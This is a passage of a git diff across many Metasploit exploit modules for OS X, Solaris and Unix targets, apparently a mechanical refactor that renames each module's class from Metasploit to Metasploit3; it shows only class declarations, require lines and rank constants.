100644 --- a/modules/exploits/osx/browser/software_update.rb +++ b/modules/exploits/osx/browser/software_update.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/osx/email/mailapp_image_exec.rb b/modules/exploits/osx/email/mailapp_image_exec.rb index c387fdef09..fe08b1e373 100644 --- a/modules/exploits/osx/email/mailapp_image_exec.rb +++ b/modules/exploits/osx/email/mailapp_image_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking # diff --git a/modules/exploits/osx/ftp/webstar_ftp_user.rb b/modules/exploits/osx/ftp/webstar_ftp_user.rb index 8c4bb3770f..c61f1ceb23 100644 --- a/modules/exploits/osx/ftp/webstar_ftp_user.rb +++ b/modules/exploits/osx/ftp/webstar_ftp_user.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/osx/http/evocam_webserver.rb b/modules/exploits/osx/http/evocam_webserver.rb index f4dab44a5e..2e4a586b97 100644 --- a/modules/exploits/osx/http/evocam_webserver.rb +++ b/modules/exploits/osx/http/evocam_webserver.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/osx/local/iokit_keyboard_root.rb b/modules/exploits/osx/local/iokit_keyboard_root.rb index 99742b8535..e0b2c5f914 100644 --- a/modules/exploits/osx/local/iokit_keyboard_root.rb +++ b/modules/exploits/osx/local/iokit_keyboard_root.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = ManualRanking # Can cause kernel crash include Msf::Post::File diff --git a/modules/exploits/osx/local/nfs_mount_root.rb b/modules/exploits/osx/local/nfs_mount_root.rb index 5216b0dbd9..c4683889ab 100644 --- a/modules/exploits/osx/local/nfs_mount_root.rb +++ b/modules/exploits/osx/local/nfs_mount_root.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File diff --git a/modules/exploits/osx/local/persistence.rb b/modules/exploits/osx/local/persistence.rb index d34949efa3..260632a90d 100644 --- a/modules/exploits/osx/local/persistence.rb +++ b/modules/exploits/osx/local/persistence.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' require 'shellwords' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::Common diff --git a/modules/exploits/osx/local/sudo_password_bypass.rb b/modules/exploits/osx/local/sudo_password_bypass.rb index 5dbbcc8fd9..fe54af173c 100644 --- a/modules/exploits/osx/local/sudo_password_bypass.rb +++ b/modules/exploits/osx/local/sudo_password_bypass.rb @@ -8,7 +8,7 @@ require 'rex' require 'msf/core/exploit/exe' require 'shellwords' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local # ManualRanking because it's going to modify system time # Even when it will try to restore things, user should use diff --git a/modules/exploits/osx/local/vmware_bash_function_root.rb b/modules/exploits/osx/local/vmware_bash_function_root.rb index f9a7f0fe88..ff20c7fe02 100644 --- a/modules/exploits/osx/local/vmware_bash_function_root.rb +++ b/modules/exploits/osx/local/vmware_bash_function_root.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit < Msf::Exploit::Local +class Metasploit3 < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::File diff --git a/modules/exploits/osx/mdns/upnp_location.rb b/modules/exploits/osx/mdns/upnp_location.rb index c0cc7bb915..3d32b05a7c 100644 --- a/modules/exploits/osx/mdns/upnp_location.rb +++ b/modules/exploits/osx/mdns/upnp_location.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/osx/misc/ufo_ai.rb b/modules/exploits/osx/misc/ufo_ai.rb index 5fe34eb28e..82404e2244 100644 --- a/modules/exploits/osx/misc/ufo_ai.rb +++ b/modules/exploits/osx/misc/ufo_ai.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb index 5e17b1562e..e9e228911d 100644 --- a/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb +++ b/modules/exploits/osx/rtsp/quicktime_rtsp_content_type.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/osx/samba/lsa_transnames_heap.rb b/modules/exploits/osx/samba/lsa_transnames_heap.rb index 28e59313d3..3eca9265e6 100644 --- a/modules/exploits/osx/samba/lsa_transnames_heap.rb +++ b/modules/exploits/osx/samba/lsa_transnames_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/osx/samba/trans2open.rb b/modules/exploits/osx/samba/trans2open.rb index 7aa37760dd..bcd15fbb39 100644 --- a/modules/exploits/osx/samba/trans2open.rb +++ b/modules/exploits/osx/samba/trans2open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/solaris/dtspcd/heap_noir.rb b/modules/exploits/solaris/dtspcd/heap_noir.rb index c65d088af2..ecf0331613 100644 --- a/modules/exploits/solaris/dtspcd/heap_noir.rb +++ b/modules/exploits/solaris/dtspcd/heap_noir.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/solaris/lpd/sendmail_exec.rb b/modules/exploits/solaris/lpd/sendmail_exec.rb index 424cf6c4d4..f71bdad36d 100644 --- a/modules/exploits/solaris/lpd/sendmail_exec.rb +++ b/modules/exploits/solaris/lpd/sendmail_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/solaris/samba/lsa_transnames_heap.rb b/modules/exploits/solaris/samba/lsa_transnames_heap.rb index 5946494f17..4445b77033 100644 --- a/modules/exploits/solaris/samba/lsa_transnames_heap.rb +++ b/modules/exploits/solaris/samba/lsa_transnames_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/solaris/samba/trans2open.rb b/modules/exploits/solaris/samba/trans2open.rb index 68f6a06c4e..926c665dce 100644 --- a/modules/exploits/solaris/samba/trans2open.rb +++ b/modules/exploits/solaris/samba/trans2open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb index 2fa2bdf008..0a6caf1ee7 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/solaris/sunrpc/sadmind_exec.rb b/modules/exploits/solaris/sunrpc/sadmind_exec.rb index 1da2ec1e05..5326f8d851 100644 --- a/modules/exploits/solaris/sunrpc/sadmind_exec.rb +++ b/modules/exploits/solaris/sunrpc/sadmind_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb index 57ed43354d..184c225c90 100644 --- a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb +++ b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/solaris/telnet/fuser.rb b/modules/exploits/solaris/telnet/fuser.rb index a69025a50e..bafae78d1e 100644 --- a/modules/exploits/solaris/telnet/fuser.rb +++ b/modules/exploits/solaris/telnet/fuser.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/solaris/telnet/ttyprompt.rb b/modules/exploits/solaris/telnet/ttyprompt.rb index 61c0b1ca7b..36c43eb15d 100644 --- a/modules/exploits/solaris/telnet/ttyprompt.rb +++ b/modules/exploits/solaris/telnet/ttyprompt.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/dhcp/bash_environment.rb b/modules/exploits/unix/dhcp/bash_environment.rb index 6a3ed6d6f9..e3e6f56fad 100644 --- a/modules/exploits/unix/dhcp/bash_environment.rb +++ b/modules/exploits/unix/dhcp/bash_environment.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/dhcp' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::DHCPServer diff --git a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb index 51ae6ebd8d..71a4fd8416 100644 --- a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb +++ b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp diff --git a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb index ba9bf43cf6..0e39c322d6 100644 --- a/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb +++ b/modules/exploits/unix/ftp/proftpd_modcopy_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb index 269018fa7c..ce6388be3e 100644 --- a/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb +++ b/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb index ae8705acec..b5a5b70f1f 100644 --- a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb +++ b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/http/ctek_skyrouter.rb b/modules/exploits/unix/http/ctek_skyrouter.rb index 5753ad6c74..ff6c6bb7a9 100644 --- a/modules/exploits/unix/http/ctek_skyrouter.rb +++ b/modules/exploits/unix/http/ctek_skyrouter.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/http/freepbx_callmenum.rb b/modules/exploits/unix/http/freepbx_callmenum.rb index 711e3872ea..cb85ffd2a2 100644 --- a/modules/exploits/unix/http/freepbx_callmenum.rb +++ b/modules/exploits/unix/http/freepbx_callmenum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/http/lifesize_room.rb b/modules/exploits/unix/http/lifesize_room.rb index f88134ba9b..8a06f2b6b2 100644 --- a/modules/exploits/unix/http/lifesize_room.rb +++ b/modules/exploits/unix/http/lifesize_room.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/http/twiki_debug_plugins.rb b/modules/exploits/unix/http/twiki_debug_plugins.rb index ad91b5daa8..53f4b48af4 100644 --- a/modules/exploits/unix/http/twiki_debug_plugins.rb +++ b/modules/exploits/unix/http/twiki_debug_plugins.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb index 21c22ed42a..1b2de6b94b 100644 --- a/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb +++ b/modules/exploits/unix/http/vmturbo_vmtadmin_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb index b4962d0b73..c9a00bc53e 100644 --- a/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb +++ b/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/distcc_exec.rb b/modules/exploits/unix/misc/distcc_exec.rb index c7ee8184fa..6a4c335ca5 100644 --- a/modules/exploits/unix/misc/distcc_exec.rb +++ b/modules/exploits/unix/misc/distcc_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/qnx_qconn_exec.rb b/modules/exploits/unix/misc/qnx_qconn_exec.rb index 465a27d66f..9bdeb95f3d 100644 --- a/modules/exploits/unix/misc/qnx_qconn_exec.rb +++ b/modules/exploits/unix/misc/qnx_qconn_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/spamassassin_exec.rb b/modules/exploits/unix/misc/spamassassin_exec.rb index 1a7b3ad1e8..1445b92a9c 100644 --- a/modules/exploits/unix/misc/spamassassin_exec.rb +++ b/modules/exploits/unix/misc/spamassassin_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/xerox_mfp.rb b/modules/exploits/unix/misc/xerox_mfp.rb index a99e9e8ae6..64b8255efb 100644 --- a/modules/exploits/unix/misc/xerox_mfp.rb +++ b/modules/exploits/unix/misc/xerox_mfp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/misc/zabbix_agent_exec.rb b/modules/exploits/unix/misc/zabbix_agent_exec.rb index 525ceb905f..7498d4486e 100644 --- a/modules/exploits/unix/misc/zabbix_agent_exec.rb +++ b/modules/exploits/unix/misc/zabbix_agent_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb index eed636b17b..c504ba9392 100644 --- a/modules/exploits/unix/smtp/clamav_milter_blackhole.rb +++ b/modules/exploits/unix/smtp/clamav_milter_blackhole.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Smtp diff --git a/modules/exploits/unix/smtp/exim4_string_format.rb b/modules/exploits/unix/smtp/exim4_string_format.rb index 75e60c862f..a985514797 100644 --- a/modules/exploits/unix/smtp/exim4_string_format.rb +++ b/modules/exploits/unix/smtp/exim4_string_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Smtp diff --git a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb index ccc863596d..02376c7c19 100644 --- a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb +++ b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::EXE diff --git a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb index 64635f4d55..5c1510028b 100644 --- a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb +++ b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb index 527d17a2da..99d0bc71fd 100644 --- a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb +++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/arkeia_upload_exec.rb b/modules/exploits/unix/webapp/arkeia_upload_exec.rb index ed3e8d6890..c97f321c9a 100644 --- a/modules/exploits/unix/webapp/arkeia_upload_exec.rb +++ b/modules/exploits/unix/webapp/arkeia_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/awstats_configdir_exec.rb b/modules/exploits/unix/webapp/awstats_configdir_exec.rb index 6cf88012ac..bc273029c4 100644 --- a/modules/exploits/unix/webapp/awstats_configdir_exec.rb +++ b/modules/exploits/unix/webapp/awstats_configdir_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/awstats_migrate_exec.rb b/modules/exploits/unix/webapp/awstats_migrate_exec.rb index d752000e66..516bac7a51 100644 --- a/modules/exploits/unix/webapp/awstats_migrate_exec.rb +++ b/modules/exploits/unix/webapp/awstats_migrate_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/awstatstotals_multisort.rb b/modules/exploits/unix/webapp/awstatstotals_multisort.rb index 184dc87ac4..de4f73f6b2 100644 --- a/modules/exploits/unix/webapp/awstatstotals_multisort.rb +++ b/modules/exploits/unix/webapp/awstatstotals_multisort.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/barracuda_img_exec.rb b/modules/exploits/unix/webapp/barracuda_img_exec.rb index 43e45e7212..ce3cf84b4a 100644 --- a/modules/exploits/unix/webapp/barracuda_img_exec.rb +++ b/modules/exploits/unix/webapp/barracuda_img_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/base_qry_common.rb b/modules/exploits/unix/webapp/base_qry_common.rb index 5ee0918217..574db617bd 100644 --- a/modules/exploits/unix/webapp/base_qry_common.rb +++ b/modules/exploits/unix/webapp/base_qry_common.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/basilic_diff_exec.rb b/modules/exploits/unix/webapp/basilic_diff_exec.rb index cfa0ba23e2..3dcef095f8 100644 --- a/modules/exploits/unix/webapp/basilic_diff_exec.rb +++ b/modules/exploits/unix/webapp/basilic_diff_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb index 3aac9af56a..66ab5cdf4e 100644 --- a/modules/exploits/unix/webapp/cacti_graphimage_exec.rb +++ b/modules/exploits/unix/webapp/cacti_graphimage_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb index 0ad447ed55..045be447c2 100644 --- a/modules/exploits/unix/webapp/cakephp_cache_corruption.rb +++ b/modules/exploits/unix/webapp/cakephp_cache_corruption.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/carberp_backdoor_exec.rb b/modules/exploits/unix/webapp/carberp_backdoor_exec.rb index 5842ee5913..66e4aed547 100644 --- a/modules/exploits/unix/webapp/carberp_backdoor_exec.rb +++ b/modules/exploits/unix/webapp/carberp_backdoor_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb b/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb index 2e82d3d81d..0e8aad113d 100644 --- a/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb +++ b/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb index b291497fe4..2c98d91f63 100644 --- a/modules/exploits/unix/webapp/clipbucket_upload_exec.rb +++ b/modules/exploits/unix/webapp/clipbucket_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/coppermine_piceditor.rb b/modules/exploits/unix/webapp/coppermine_piceditor.rb index d4bb0dac5c..948a9108db 100644 --- a/modules/exploits/unix/webapp/coppermine_piceditor.rb +++ b/modules/exploits/unix/webapp/coppermine_piceditor.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/datalife_preview_exec.rb b/modules/exploits/unix/webapp/datalife_preview_exec.rb index 44ddf3570b..d39e728937 100644 --- a/modules/exploits/unix/webapp/datalife_preview_exec.rb +++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/dogfood_spell_exec.rb b/modules/exploits/unix/webapp/dogfood_spell_exec.rb index 95d10db9a4..7ae0f83833 100644 --- a/modules/exploits/unix/webapp/dogfood_spell_exec.rb +++ b/modules/exploits/unix/webapp/dogfood_spell_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/egallery_upload_exec.rb b/modules/exploits/unix/webapp/egallery_upload_exec.rb index a6a84c48fb..8b24944c6f 100644 --- a/modules/exploits/unix/webapp/egallery_upload_exec.rb +++ b/modules/exploits/unix/webapp/egallery_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/flashchat_upload_exec.rb b/modules/exploits/unix/webapp/flashchat_upload_exec.rb index 7204a9b477..6324068bf5 100644 --- a/modules/exploits/unix/webapp/flashchat_upload_exec.rb +++ b/modules/exploits/unix/webapp/flashchat_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/foswiki_maketext.rb b/modules/exploits/unix/webapp/foswiki_maketext.rb index 6313b31b58..0cb8ac52d9 100644 --- a/modules/exploits/unix/webapp/foswiki_maketext.rb +++ b/modules/exploits/unix/webapp/foswiki_maketext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/freepbx_config_exec.rb b/modules/exploits/unix/webapp/freepbx_config_exec.rb index d1838cb8c8..f530c09ab0 100644 --- a/modules/exploits/unix/webapp/freepbx_config_exec.rb +++ b/modules/exploits/unix/webapp/freepbx_config_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/unix/webapp/generic_exec.rb b/modules/exploits/unix/webapp/generic_exec.rb index 0746d5f2dd..2ae8d9d41a 100644 --- a/modules/exploits/unix/webapp/generic_exec.rb +++ 